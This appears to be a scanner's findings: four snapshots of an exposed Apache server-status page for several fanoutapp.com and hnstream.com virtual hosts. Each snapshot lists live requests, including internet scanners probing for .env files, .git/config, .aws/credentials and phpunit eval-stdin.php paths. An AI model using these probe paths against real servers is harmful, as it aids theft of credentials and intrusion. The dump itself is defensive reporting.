Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Monday, 03-Mar-2025 04:16:51 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 51 days 5 hours 37 minutes 54 seconds Server load: 0.75 0.64 0.50 Total accesses: 54765 - Total Traffic: 163.5 MB - Total Duration: 2670462 CPU Usage: u78.94 s125.81 cu924.39 cs336.84 - .0331% CPU load .0124 requests/sec - 38 B/second - 3130 B/request - 48.7622 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 085941no0yes124000 155831no0yes025000 356175no0yes025000 Sum300 174000 ________________W_________________________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-45859410/88/959_ 3.12356221176520.00.252.53 47.245.92.190http/1.1api.hnstream.com:8000 0-45859410/82/919_ 3.138973159780.00.313.07 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/79/895_ 3.18238126340.00.302.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/80/940_ 3.1813341670.00.262.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 0-45859410/85/882_ 3.173620137280.00.222.33 127.0.0.1http/1.1hnstream.com:8000HEAD /new HTTP/1.1 0-45859410/85/921_ 3.17896150270.00.242.73 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 0-45859410/91/922_ 3.1903142810.00.412.83 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-45859410/83/916_ 3.1913129540.00.362.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-45859410/83/897_ 3.18524446450.00.373.04 127.0.0.1http/1.1api.hnstream.com:8000GET /geoserver/web/ HTTP/1.1 0-45859410/88/956_ 3.1903665210.00.252.91 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-45859410/69/879_ 3.1816133070.00.202.61 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-45859410/80/917_ 3.1736201145590.00.192.78 127.0.0.1http/1.1hnstream.com:8000HEAD /main HTTP/1.1 0-45859410/83/902_ 3.171030251510.00.372.73 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-45859410/78/932_ 3.121488292480.00.232.54 127.0.0.1http/1.1editor.fanoutapp.com:8000HEAD / HTTP/1.1 0-45859410/82/894_ 3.1647231146720.00.352.53 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 0-45859410/79/919_ 3.12987168070.00.272.84 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-458594110/89/903W 3.1700159680.00.322.49 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-45859410/81/919_ 3.1715319130510.00.363.13 127.0.0.1http/1.1api.hnstream.com:8000GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1 0-45859410/78/920_ 3.1903129950.00.402.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-45859410/81/909_ 3.1913126420.00.292.44 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-45859410/86/892_ 3.13846130220.00.402.60 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/jquery-3.1.1.min.js HTTP/1.1 0-45859410/77/921_ 3.1903124800.00.232.47 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-45859410/81/902_ 3.173620637610.00.292.73 127.0.0.1http/1.1hnstream.com:8000HEAD /old HTTP/1.1 0-45859410/87/920_ 3.173620120040.00.272.63 127.0.0.1http/1.1hnstream.com:8000HEAD /backup HTTP/1.1 0-45859410/78/905_ 3.173610445820.00.282.82 127.0.0.1http/1.1hnstream.com:8000HEAD /home HTTP/1.1 1-45558310/49/621_ 2.1665319110730.00.212.21 47.245.92.190http/1.1 1-45558310/51/617_ 2.166261117450.00.231.83 127.0.0.1http/1.1hnstream.com:8000GET /static/require-2.1.11-min.js HTTP/1.1 1-45558310/38/589_ 2.16632190780.00.101.96 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-45558310/51/621_ 2.19622894380.00.102.15 127.0.0.1http/1.1editor.fanoutapp.com:8000HEAD / HTTP/1.1 1-45558310/41/618_ 2.112624116300.00.121.88 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-45558310/38/602_ 2.13635791200.00.171.93 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 1-45558310/44/628_ 2.18616187560.00.142.25 127.0.0.1http/1.1hnstream.com:8000GET /static/pollymer-1.1.0.js HTTP/1.1 1-45558310/41/609_ 2.1811822583470.00.131.88 157.52.116.90http/1.1api.hnstream.com:8000GET /comments/items/?since=cursor:43154173 HTTP/1.1 1-45558310/37/616_ 2.16653291160.00.181.77 47.245.92.190http/1.1 1-45558310/50/612_ 2.196405100720.00.142.02 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-45558310/45/615_ 2.2626727596710.00.192.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-45558310/45/617_ 2.1610253286950.00.132.01 157.52.116.89http/1.1api.hnstream.com:8000GET /comments/items/ HTTP/1.1 1-45558310/46/611_ 2.1810304184230.00.121.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-45558310/44/604_ 2.121177884260.00.372.47 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /login.action HTTP/1.1 1-45558310/48/632_ 2.19631096880.00.111.98 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.css HTTP/1.1 1-45558310/46/606_ 2.266215584400.00.141.64 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/jquery-3.1.1.min.js HTTP/1.1 1-45558310/47/622_ 2.256213588110.00.212.05 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-45558310/35/617_ 2.176220104440.00.152.15 127.0.0.1http/1.1hnstream.com:8000GET /static/main.js HTTP/1.1 1-45558310/39/605_ 2.186531786930.00.111.88 47.245.92.190http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-45558310/48/594_ 2.236215586360.00.181.70 127.0.0.1http/1.1editor.fanoutapp.com:8000HEAD /static/editor/jquery-3.1.1.min.js HTTP/1.1 1-45558310/34/603_ 2.22621384030.00.082.03 127.0.0.1http/1.1editor.fanoutapp.com:8000HEAD /static/editor/ot.js HTTP/1.1 1-45558310/38/597_ 2.18654190650.00.182.08 47.245.92.190http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-45558310/45/601_ 2.256212397520.00.202.23 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 1-45558310/41/596_ 2.226212185220.00.112.00 127.0.0.1http/1.1editor.fanoutapp.com:8000HEAD /static/editor/codemirror.js HTTP/1.1 1-45558310
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfde1b8f3a
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Saturday, 01-Mar-2025 02:10:45 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 49 days 3 hours 31 minutes 48 seconds Server load: 0.58 0.49 0.45 Total accesses: 51942 - Total Traffic: 152.3 MB - Total Duration: 2172479 CPU Usage: u72.4 s119.44 cu924.39 cs336.84 - .0342% CPU load .0122 requests/sec - 37 B/second - 3074 B/request - 41.8251 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 085941no0yes025000 155831no0yes124000 356175no0yes025000 Sum300 174000 _________________________________W________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-45859410/18/889_ 0.56329511666420.00.042.32 104.156.87.47http/1.1api.livecounter.org:8000GET / HTTP/1.1 0-45859410/13/850_ 0.53329013149990.00.032.80 127.0.0.1http/1.1hnstream.com:8000GET /static/pollymer-1.1.0.js HTTP/1.1 0-45859410/11/827_ 0.4825171115420.00.032.49 127.0.0.1http/1.1hnstream.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-45859410/13/873_ 0.474280336060.00.032.48 127.0.0.1http/1.1hnstream.com:8000GET /actuator/env HTTP/1.1 0-45859410/14/811_ 0.56404831127100.00.032.14 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/12/848_ 0.57163910142190.00.022.52 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/18/849_ 0.5524733133090.00.042.46 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/12/845_ 0.4716341123900.00.102.45 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-45859410/16/830_ 0.57214848437470.00.042.71 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-45859410/17/885_ 0.5843312656190.00.042.70 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/9/819_ 0.5013031129220.00.022.43 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-45859410/13/850_ 0.5340431635390.00.032.63 127.0.0.1http/1.1hnstream.com:8000GET /static/json2.js HTTP/1.1 0-45859410/12/831_ 0.4827850242290.00.102.46 127.0.0.1http/1.1hnstream.com:8000GET /telescope/requests HTTP/1.1 0-45859410/10/864_ 0.5021432286420.00.022.34 35.203.211.204http/1.1api.hnstream.com:8000\x16\x03\x01 0-45859410/16/828_ 0.56279038635960.00.032.22 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-45859410/15/855_ 0.5625229159230.00.032.60 157.52.108.62http/1.1api.hnstream.com:8000GET /.git/config HTTP/1.1 0-45859410/19/833_ 0.582760151220.00.042.21 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-45859410/15/853_ 0.5345091119800.00.032.80 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-45859410/16/858_ 0.55451469120070.00.042.52 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/10/838_ 0.482712117010.00.022.17 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-45859410/18/824_ 0.57130823123420.00.112.31 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-45859410/11/855_ 0.5046468117160.00.032.26 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/11/832_ 0.5045815624580.00.022.45 104.156.83.56http/1.1api.hnstream.com:8000GET /comments/items/?since=cursor:43154173 HTTP/1.1 0-45859410/16/849_ 0.5545861110480.00.032.39 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-45859410/12/839_ 0.56451414436610.00.022.57 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-45558310/18/590_ 0.7104107070.00.032.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-45558310/19/585_ 0.7204109870.00.041.64 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-45558310/14/565_ 0.70389085620.00.021.89 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/tags HTTP/1.1 1-45558310/20/590_ 0.70390087970.00.042.08 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/stargazers HTTP/1.1 1-45558310/15/592_ 0.713870104960.00.031.79 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/pulse HTTP/1.1 1-45558310/14/578_ 0.720385750.00.021.79 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-45558310/17/601_ 0.710484090.00.042.15 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-45558310/16/584_ 0.710479500.00.031.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-455583110/15/594W 0.700086870.00.031.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-45558310/17/579_ 0.70395093950.00.031.91 127.0.0.1http/1.1hnstream.com:8000POST /signup HTTP/1.1 1-45558310/16/586_ 0.710790620.00.031.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-45558310/19/591_ 0.7103980530.00.041.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-45558310/16/581_ 0.71388074180.00.041.61 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/actions HTTP/1.1 1-45558310/14/574_ 0.710481390.00.032.13 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-45558310/19/603_ 0.70389089150.00.041.91 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/branches HTTP/1.1 1-45558310/13/573_ 0.71387076940.00.031.53 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/security HTTP/1.1 1-45558310/19/594_ 0.663821381900.00.041.88 140.248.74.29http/1.1api.livecounter.org:8000GET /robots.txt HTTP/1.1 1-45558310/12/594_ 0.71388095490.00.022.02 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/projects HTTP/1.1 1-45558310/16/582_ 0.710384280.00.031.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-45558310/18/564_ 0.70391078450.00.041.55 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API HTTP/1.1 1-45558310/13/582_ 0.70389076890.00.031.98 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/forks HTTP/1.1 1-45558310/14/573_ 0.70391084970.00.031.94 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews HTTP/1.1 1-45558310/15/571_ 0.70388088360.00.042.07 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/activity HTTP/1.1 1-45558310/17/572_ 0.70390078650.00.031.92 127.0.0.1http/1.1hnstream.com:8000GET /HackerNews/API/blob/master/LICENSE HTTP/1.1 1-45558310/12/593_ 0.71388072470.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf1b665e67
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Wednesday, 26-Feb-2025 18:54:04 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 46 days 20 hours 15 minutes 7 seconds Server load: 0.34 0.35 0.37 Total accesses: 49125 - Total Traffic: 144.6 MB - Total Duration: 1544319 CPU Usage: u70.8 s114.67 cu919.68 cs334.35 - .0356% CPU load .0121 requests/sec - 37 B/second - 3085 B/request - 31.4365 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03975703no0yes025000 23975704no0yes124000 Sum200 149000 _________________________.........................______________ __W________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4539757030/48/843_ 1.7729472646250.00.102.22 64.227.155.160http/1.1api.hnstream.com:8000\x16\x03\x01 0-4539757030/51/814_ 1.79146123131940.00.132.60 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-4539757030/44/793_ 1.761411599780.00.182.41 178.128.24.96http/1.1api.hnstream.com:8000GET /login HTTP/1.1 0-4539757030/45/834_ 1.71294710312670.00.122.40 64.227.155.160http/1.1 0-4539757030/43/771_ 1.7729471108890.00.092.04 64.227.155.160http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/43/809_ 1.65362516122200.00.112.44 178.128.24.96http/1.1 0-4539757030/38/810_ 1.7697245111460.00.112.36 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-4539757030/44/809_ 1.7623310102870.00.182.29 178.128.24.96http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/38/786_ 1.6529471100840.00.102.60 64.62.197.189http/1.1 0-4539757030/51/843_ 1.76325326634650.00.132.60 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/40/789_ 1.76138919111330.00.082.35 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/49/813_ 1.7520719116520.00.202.54 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/53/794_ 1.7923810222900.00.202.23 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/45/826_ 1.7913942266580.00.192.25 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/37/787_ 1.66292178616150.00.102.13 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-4539757030/50/820_ 1.7729469138870.00.202.52 64.227.155.160http/1.1api.hnstream.com:8000GET /login HTTP/1.1 0-4539757030/39/792_ 1.65316410130370.00.092.11 199.45.155.74http/1.1 0-4539757030/48/816_ 1.7631692100920.00.102.71 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/44/815_ 1.653248998490.00.132.41 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/41/805_ 1.752340096510.00.172.09 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4539757030/45/783_ 1.7829218104230.00.112.14 47.98.99.159http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-4539757030/43/819_ 1.6629461096090.00.132.17 64.227.155.160http/1.1 0-4539757030/45/798_ 1.7823452104620.00.182.38 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4539757030/40/810_ 1.7820763291110.00.162.23 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/44/799_ 1.799771419070.00.142.48 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/572. 0.00500016192910.00.001.99 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/566. 0.00500016492890.00.001.60 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-41-0/0/551. 0.005000162671380.00.001.87 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.005000161174840.00.002.04 127.0.0.1http/1.1api.hnstream.com:8000GET /sitemap.xml HTTP/1.1 1-41-0/0/577. 0.00500016388730.00.001.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /node_modules/.env HTTP/1.1 1-41-0/0/564. 0.00500016070610.00.001.76 45.91.171.220http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/584. 0.00500016369020.00.002.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /laravel/.env.production HTTP/1.1 1-41-0/0/568. 0.00500016563000.00.001.75 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/chat/jquery-3.2.1.min.js HTTP/1.1 1-41-0/0/579. 0.00500016670490.00.001.60 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/562. 0.00500016077350.00.001.88 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.00500016476630.00.001.91 147.185.133.181http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/572. 0.00500016667370.00.001.88 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/565. 0.005000161259750.00.001.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.dev.local HTTP/1.1 1-41-0/0/560. 0.00500016668420.00.002.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/584. 0.00500016474080.00.001.87 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.template HTTP/1.1 1-41-0/0/560. 0.00500016363610.00.001.50 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 1-41-0/0/575. 0.00500016465100.00.001.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.local HTTP/1.1 1-41-0/0/582. 0.00500016380920.00.002.00 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 1-41-0/0/566. 0.00500016569260.00.001.77 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/546. 0.00500016464820.00.001.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.staging HTTP/1.1 1-41-0/0/569. 0.00500016061800.00.001.95 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/559. 0.00500016368030.00.001.91 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-41-0/0/556. 0.00500016173980.00.002.03 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/555. 0.00500016364570.00.001.89 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/581. 0.005000162156490.00.001.66 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 2-4539757040/66/612_ 2.509021122790.00.241.77 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 2-4539757040/54/569_ 2.57</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf614d0b8c
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Monday, 24-Feb-2025 14:41:56 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 44 days 16 hours 2 minutes 59 seconds Server load: 0.57 0.48 0.46 Total accesses: 46942 - Total Traffic: 137.7 MB - Total Duration: 633185 CPU Usage: u65.24 s108.1 cu919.68 cs334.35 - .037% CPU load .0122 requests/sec - 37 B/second - 3075 B/request - 13.4887 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03975703no0yes025000 23975704no0yes124000 Sum200 149000 _________________________.........................______________ ________W__..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4539757030/8/803_ 0.2633061139770.00.022.14 147.185.132.75http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/8/771_ 0.2536557126930.00.022.50 127.0.0.1http/1.1api.hnstream.com:8000GET /glpi/vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 0-4539757030/6/755_ 0.243650594460.00.022.25 127.0.0.1http/1.1api.hnstream.com:8000GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-4539757030/6/795_ 0.2538047118320.00.012.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-4539757030/6/734_ 0.2337994103150.00.011.96 127.0.0.1http/1.1api.hnstream.com:8000GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 0-4539757030/6/772_ 0.25365516117160.00.022.35 127.0.0.1http/1.1api.hnstream.com:8000GET /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 0-4539757030/5/777_ 0.2539934106580.00.012.27 194.50.16.252http/1.1api.hnstream.com:8000\x16\x03\x01 0-4539757030/5/770_ 0.233990498290.00.012.12 127.0.0.1http/1.1api.hnstream.com:8000GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-4539757030/5/753_ 0.243372495190.00.012.51 127.0.0.1http/1.1api.hnstream.com:8000GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-4539757030/8/800_ 0.26337724120810.00.022.49 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/5/754_ 0.2541211107810.00.012.28 206.168.34.207http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/6/770_ 0.2241203110720.00.012.36 206.168.34.207http/1.1 0-4539757030/5/746_ 0.2341153103920.00.022.04 127.0.0.1http/1.1api.hnstream.com:8000GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-4539757030/7/788_ 0.25411513108870.00.022.08 206.168.34.207http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 0-4539757030/4/754_ 0.2433014108580.00.012.04 127.0.0.1http/1.1api.hnstream.com:8000GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 0-4539757030/8/778_ 0.26306114132320.00.022.34 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-4539757030/5/758_ 0.2430565124570.00.012.02 127.0.0.1http/1.1api.hnstream.com:8000GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 0-4539757030/7/775_ 0.263012194430.00.012.63 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/7/778_ 0.243007493710.00.052.32 127.0.0.1http/1.1api.hnstream.com:8000GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 0-4539757030/7/771_ 0.2621711191640.00.011.94 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/4/742_ 0.242982699920.00.012.05 127.0.0.1http/1.1api.hnstream.com:8000GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-4539757030/5/781_ 0.242166592450.00.042.08 127.0.0.1http/1.1api.hnstream.com:8000GET /containers/json HTTP/1.1 0-4539757030/4/757_ 0.225717699540.00.012.20 127.0.0.1http/1.1api.hnstream.com:8000GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 0-4539757030/5/775_ 0.254685484250.00.012.08 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-4539757030/6/761_ 0.2246806101870.00.042.37 127.0.0.1http/1.1api.hnstream.com:8000GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-41-0/0/572. 0.00312088192910.00.001.99 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/566. 0.00312088492890.00.001.60 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-41-0/0/551. 0.003120882671380.00.001.87 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.003120881174840.00.002.04 127.0.0.1http/1.1api.hnstream.com:8000GET /sitemap.xml HTTP/1.1 1-41-0/0/577. 0.00312088388730.00.001.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /node_modules/.env HTTP/1.1 1-41-0/0/564. 0.00312088070610.00.001.76 45.91.171.220http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/584. 0.00312088369020.00.002.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /laravel/.env.production HTTP/1.1 1-41-0/0/568. 0.00312088563000.00.001.75 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/chat/jquery-3.2.1.min.js HTTP/1.1 1-41-0/0/579. 0.00312088670490.00.001.60 